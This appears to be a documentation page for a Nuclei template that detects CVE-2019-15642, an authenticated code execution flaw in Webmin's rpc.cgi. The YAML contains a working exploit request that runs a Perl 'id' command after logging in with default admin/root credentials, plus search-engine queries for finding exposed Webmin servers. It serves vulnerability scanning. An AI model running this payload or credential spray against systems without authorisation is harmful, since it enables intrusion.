Skip to content
Nuclei Templates

Webmin < 1.920 - Authenticated Remote Code Execution

ID: CVE-2019-15642

Severity: high

Author: pussycat0x

Tags: cve,cve2019,webmin,rce

Description

Section titled “Description”

rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states “RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.”

YAML Source

Section titled “YAML Source”
id: CVE-2019-15642


info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
    - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index
    - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37
    - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-15642
    cwe-id: CWE-94
    epss-score: 0.22278
    epss-percentile: 0.9605
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: webmin
    product: webmin
    shodan-query:
      - title:"Webmin"
      - http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2019,webmin,rce
variables:
  cmd: '`id`'


http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate


        user={{username}}&pass={{password}}
      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate


        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";


    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root
    stop-at-first-match: true
    host-redirects: true


    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'


      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022066f8876c77efd0bf866f45455cb92a99e475a66b4f07adc82f752189e6e768f2022100b57db0c19142b27c6311f0825cc2dbbb5f44269f669bd109b14f59d0c445603c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-15642.yaml"

View on Github